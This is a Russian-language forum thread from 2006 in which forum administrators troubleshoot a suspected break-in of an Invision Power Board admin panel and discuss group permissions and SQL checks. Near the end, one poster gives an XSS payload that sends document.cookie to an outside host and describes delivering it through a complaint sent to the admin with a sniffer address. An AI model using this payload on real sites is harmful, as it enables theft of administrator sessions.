sapron Опубликовано 18 Апреля 2006 Жалоба Поделиться Опубликовано 18 Апреля 2006 Как избавиться от sql-инъекции? Ссылка на комментарий Поделиться на других сайтах Прочее
xRay Опубликовано 18 Апреля 2006 Жалоба Поделиться Опубликовано 18 Апреля 2006 .silentНет этого не былоЕще ни кто с подобной ситуацией не сталкивался? Ссылка на комментарий Поделиться на других сайтах Прочее
Ринальдус Опубликовано 18 Апреля 2006 Жалоба Поделиться Опубликовано 18 Апреля 2006 У меня вот что произошло. Каким-то образом пользователь забанил другого пользователя. Через предупреждения, т.е как модератор. Я решил, что он использовал какую-то уязвимость в 2.1.4 и срочно обновил форум до 2.1.5. После чего я 2-му админу (я не единственный админ на форуме) написал несколько слов в админке в блокнот. А этот хакер там ответил!!! Смотрю наши админские логи - ничего, все чисто. В смысле, отображено то, что мы со 2-м админом сами делали. Вот и возникает вопрос: WTF? Каким образом он смог проникнуть в админку, если в 2.1.5 нет еще обнаруженных уязвимостей? Пароль я поменял. Его следов в админке не вижу. Но покоя мне нет. Объясните, какими путями можно взломать форум, чтоб войти в админку? Я никогда этим не интересовался, потому что у меня мозги не набекрень, как у хакеров. Хакеры, я считаю, - больные люди. А теперь придется все это изучать, чтобы от них защититься... Ссылка на комментарий Поделиться на других сайтах Прочее
Milse Опубликовано 18 Апреля 2006 Жалоба Поделиться Опубликовано 18 Апреля 2006 Ринальдус! Участие во второй группе. Выполни запрос и глянь кто. SELECT id, name, mgroup, mgroup_others, org_perm_idFROM ibf_members WHERE mgroup_others>0 OR org_perm_id >0 Ссылка на комментарий Поделиться на других сайтах Прочее
nafigator Опубликовано 19 Апреля 2006 Жалоба Поделиться Опубликовано 19 Апреля 2006 Ринальдус, пароль нужно сменить у всех админов.А теперь, похоже, и у всех юзеров. Ссылка на комментарий Поделиться на других сайтах Прочее
Ринальдус Опубликовано 19 Апреля 2006 Жалоба Поделиться Опубликовано 19 Апреля 2006 Участие во второй группе.Как понять эту фразу?Выполни запрос и глянь кто.Да я знаю, кто это. Мне непонятны лишь 2 вещи:1. Как он смог взломать форум.2. Может ли он сейчас войти в админку и что мне надо сделать, чтобы перекрыть ему доступ.У него я это спросить не могу, т.к не хочу, чтобы он знал, что я все знаю. Иначе затаится и все.SELECT id, name, mgroup, mgroup_others, org_perm_idFROM ibf_members WHERE mgroup_others>0 OR org_perm_id >0Где выполнить запрос: в SQL-разделе админки или в phpMyAdmin? И что это даст?Ринальдус, пароль нужно сменить у всех админов.Себе пароль я сменил. И 2-му админу скажу тоже сменить.А теперь, похоже, и у всех юзеров.Сменить пароль более чем у 100 юзеров? И как я им объясню мотивы? Я же не хочу, чтобы они знали про все это. И мне тоже непонятно, зачем менять пароли ВСЕМ юзерам. Можно разве что этому хакеру сменить пароль к его аккаунту, только все равно не понимаю, что это даст. Ссылка на комментарий Поделиться на других сайтах Прочее
dfc_darkman Опубликовано 19 Апреля 2006 Жалоба Поделиться Опубликовано 19 Апреля 2006 Ринальдусты не понял.Возьми отредактируй какого-либо юзверя. Там есть вкладка - "ВТОРОСТЕПЕННАЯ ГРУППА" или типа того.Тоесть.Вот у меня, например, есть человек на форуме - он в группе ВИП Но второстепенная группа у него "АДМИН" - соответсвенно он на форуме с админскими правами и имеет доступ в АЦ. Тоже самое может быть и у тебя - какой-то юзверь каким-то макаром присобачил себе второстепенную группу. У него пишетца member, а в натуре - он админ.Вышеуказанный запрос позволяет определить таких юзверей. Его можно выполнить как в АЦ таки в пхпмайадмин Вперёд Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 19 Апреля 2006 Жалоба Поделиться Опубликовано 19 Апреля 2006 А нифига не получится ИМХО.Вход идёт по правам основной группы Ссылка на комментарий Поделиться на других сайтах Прочее
xRay Опубликовано 19 Апреля 2006 Жалоба Поделиться Опубликовано 19 Апреля 2006 SongНа счет второстепенной группы все пашет как сказал dfc_darkman Ссылка на комментарий Поделиться на других сайтах Прочее
Ринальдус Опубликовано 19 Апреля 2006 Жалоба Поделиться Опубликовано 19 Апреля 2006 Гм... смотрю я профиль этого хакера. Основная группа: "Пользователь". Второстепенная группа: "Пользователь". Все правильно, так и надо. А если он залез в админку хз каким образом, сменил себе второстепенную группу, забанил юзера, потом поменял группу на прежнюю - об этом где-нибудь в логах записано? Ведь он может так всегда и делать, когда захочет вновь получить доступ...P.S. Запустил запрос, он мне выдал пустую таблицу без каких-либо записей. Так и должно быть? Ссылка на комментарий Поделиться на других сайтах Прочее
Lenar Опубликовано 19 Апреля 2006 Жалоба Поделиться Опубликовано 19 Апреля 2006 А как в версии 2.1.5 защититься от этого хака http://forum.antichat.ru/threadnav17358-3-10.html Ссылка на комментарий Поделиться на других сайтах Прочее
dfc_darkman Опубликовано 19 Апреля 2006 Жалоба Поделиться Опубликовано 19 Апреля 2006 А нифига не получится ИМХО.Вход идёт по правам основной группыНу у меня работает Имхо, походу дела, как написано на самом форуме в админке или типа того - права двух групп суммируются - вот и всё. Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 20 Апреля 2006 Жалоба Поделиться Опубликовано 20 Апреля 2006 Имхо, походу дела, как написано на самом форуме в админке или типа того - права двух групп суммируются - вот и всё.SongНа счет второстепенной группы все пашет как сказал dfc_darkmanЧего вы мне парите?Вот я смотрю admin.php и вижу: // Do we have admin access? //---------------------------------- $DB->query("SELECT * FROM ibf_groups WHERE g_id='".$MEMBER['mgroup']."'"); $GROUP = $DB->fetch_row(); if ($GROUP['g_access_cp'] != 1) { do_login("You do not have access to the administrative CP"); } else { $session_validated = 1; $this_session = $row; }Обратите внимание на строчку "if ($GROUP['g_access_cp'] != 1)" ! Допустим есть пользователь "Вася". У него группа "Гости". Ему дали второстепенную группу "Админы".Этот запрос вернёт g_access_cp = 0! т.к. у группы гости нет входа в админку, не смотря на то что "второстепенная группа" которая правильней называется "дополнительная маска" поставлена админская маска.Дополнительная маска играет роль только на доступ в разделы! Ну ещё возможен вариант: я не понял про что вы говорите Ссылка на комментарий Поделиться на других сайтах Прочее
Dr.Freddy Опубликовано 20 Апреля 2006 Жалоба Поделиться Опубликовано 20 Апреля 2006 Если у пользователя проставлена вторичная группа — администраторы, он имеет право входа в админ-панель, но не считается ROOT админом и не имеет права доступа к некоторым секциям, например SQL Toolbox. Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 20 Апреля 2006 Жалоба Поделиться Опубликовано 20 Апреля 2006 Ок, Попробовал.Вот что получил:You do not have access to the administrative CP Хотя, я вот что думаю.А может эта шняга появилась с 1.3 ? Ссылка на комментарий Поделиться на других сайтах Прочее
Dr.Freddy Опубликовано 20 Апреля 2006 Жалоба Поделиться Опубликовано 20 Апреля 2006 А ты проставил администраторскую группу или маску доступа? Если группу, то доступ есть 100% — я так часто на поддерживаемых форумах сижу, и меня не видно, и доступ к админке есть. Вполне возможно, что появилась именно с 1.3.1, я версии старше не админил и даже не ставил. Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 20 Апреля 2006 Жалоба Поделиться Опубликовано 20 Апреля 2006 Ок, тогда расскажи где в админке 1.3 назначается1) администраторская группа2) второстепенная группа 1. Это наверно в комбо-боксе групп в режиме редактирования пользователя2. ? Ссылка на комментарий Поделиться на других сайтах Прочее
Dr.Freddy Опубликовано 20 Апреля 2006 Жалоба Поделиться Опубликовано 20 Апреля 2006 Админская группа задаётся в conf_global.php переменной admin_group. Основная группа пользователя проставляется в интерфейсе редактирования пользователя, а вот второстепенная, я смотрю, появилась только в 2.0.x — в моей инсталляции 1.3.1 такой опции нет. В установленной 2.0.4 — есть, задаётся в том же интерфейсе редактирования пользователя. Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 20 Апреля 2006 Жалоба Поделиться Опубликовано 20 Апреля 2006 ну так ё-моё я ж про 1.хпри чём тут вообще 2.х ? хотя в принципе почему я должен был так думать.. никто про версию не говорил.Ну короче в 1.х нет никаких второстепеннных групп, там есть такой термин "дополнительная маска", которая в оригинале сделана очень тупо и убого, пришлось всё переделывать. Чтобы она действительно дополняла, а не замещала. Очень помогает дать добавочные права на разделы. Именно на разделы, админка здесь вообще не причём! На доступ в админку не влияет. Ссылка на комментарий Поделиться на других сайтах Прочее
sad888 Опубликовано 24 Апреля 2006 Жалоба Поделиться Опубликовано 24 Апреля 2006 Вопрос как закрыть уязвимости про которые написано на:http://forum.antichat.ru/threadnav17358-1-10.htmlhttp://forum.antichat.ru/threadnav17281-1-10.html Ссылка на комментарий Поделиться на других сайтах Прочее
freeman85 Опубликовано 25 Апреля 2006 Жалоба Поделиться Опубликовано 25 Апреля 2006 чет на античате столько гозных тем, что все и вся работает...успокойте.. скажите что это не работает Ссылка на комментарий Поделиться на других сайтах Прочее
AHTIKILLER Опубликовано 25 Апреля 2006 Жалоба Поделиться Опубликовано 25 Апреля 2006 могут украсть кукисы администрацииКто не в курсе - в апрельском Х@кере писали про возможность увода админских кукисов посредством сниффера с помощью отправки жалобы, содержащей код (версия 2.1.3):<php><СКРИПТ>img = new Image(); img. src = "http://xxxxx/s/s.gif?"+document.cookie;</СКРИПТ></php>Подскажите, как это закрыть, т.к. в ipb 2.0.4 также отлично работает. (Наверное, уже исправлено в 2.1.4 и 2.1.5). Ссылка на комментарий Поделиться на других сайтах Прочее
dfc_darkman Опубликовано 25 Апреля 2006 Жалоба Поделиться Опубликовано 25 Апреля 2006 Еще раз, только точно - какой код для 2.0.4. нужно пописать и где? Ссылка на комментарий Поделиться на других сайтах Прочее
ВасилОК Опубликовано 25 Апреля 2006 Жалоба Поделиться Опубликовано 25 Апреля 2006 AHTIKILLERБыло уже. Читайте топик. Ссылка на комментарий Поделиться на других сайтах Прочее
AHTIKILLER Опубликовано 25 Апреля 2006 Жалоба Поделиться Опубликовано 25 Апреля 2006 Ладно, чуть позже почитаю, пока что-то не нашел. dfc_darkman Отправить жалобу админу на сообщение (скажем, содержащее флуд). Туда и вписать код с адресом сниффера (допустим, этого _http://kanick.ру/sniffer). Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения